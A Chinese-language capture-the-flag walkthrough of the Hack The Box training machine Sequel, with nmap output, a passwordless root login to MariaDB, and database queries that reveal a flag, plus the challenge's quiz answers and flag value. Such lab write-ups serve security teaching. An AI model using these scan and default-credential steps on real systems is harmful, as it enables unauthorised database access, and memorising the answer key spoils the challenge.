Hackthebox 靶机Sequel攻略
目标:Sequel
题目难度:very easy
作者使用Kali Linux作为渗透测试平台,在Kali Linux上首先通过openvpn建立与Hackthebox网站的VPN连接,并且在Hackthebox网站上启用(spawn)Sequel实例(如下图所示),得到目标Sequel实例的IP地址:
# openvpn starting_point_jasonhuawen.ovpn
Task 1: What does the acronym SQL stand for?
答案: Structured Query Language
Task 2: During our scan, which port running mysql do we find?
思路:利用nmap扫描目标,即可得到Mysql服务运行的端口
# nmap -sS 10.129.95.232 130 ⨯ Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-01 08:40 EDT Nmap scan report for 10.129.94.111 Host is up (0.20s latency). Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE 3306/tcp open mysql
答案: 3306
Task 3: What community-developed MySQL version is the target running?
答案: MariaDB
Task 4: What switch do we need to use in order to specify a login username for the MySQL service?
答案: -u
Task 5: Which username allows us to log into MariaDB without providing a password?
思路:思路已经很明显了,那就直接用root尝试登陆MariaDB,发现确实不用密码即可进入数据库
答案: root
# mysql -uroot -h 10.129.95.232
Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 75 Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]>
Task 6: What symbol can we use to specify within the query that we want to display eveything inside a table?
答案: *
Task 7: What symbol do we need to end each query with?
答案: ;
最后一道是拿flag,比较容易,既然进入数据库了,先看下有哪些数据库,第一眼就看到了htb,然后看下这个数据库有什么表,逐一查看每个表中有哪些数据,即可看到flag了:
MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | htb | | information_schema | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.244 sec) MariaDB [(none)]> use htb; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [htb]> show tables; +---------------+ | Tables_in_htb | +---------------+ | config | | users | +---------------+ 2 rows in set (0.200 sec) MariaDB [htb]> select * from users; +----+----------+------------------+ | id | username | email | +----+----------+------------------+ | 1 | admin | admin@sequel.htb | | 2 | lara | lara@sequel.htb | | 3 | sam | sam@sequel.htb | | 4 | mary | mary@sequel.htb | +----+----------+------------------+ 4 rows in set (0.759 sec) MariaDB [htb]> select * from config -> ; +----+-----------------------+----------------------------------+ | id | name | value | +----+-----------------------+----------------------------------+ | 1 | timeout | 60s | | 2 | security | default | | 3 | auto_logon | false | | 4 | max_size | 2M | | 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 | | 6 | enable_uploads | false | | 7 | authentication_method | radius | +----+-----------------------+----------------------------------+ 7 rows in set (0.206 sec)
成功拿到flag
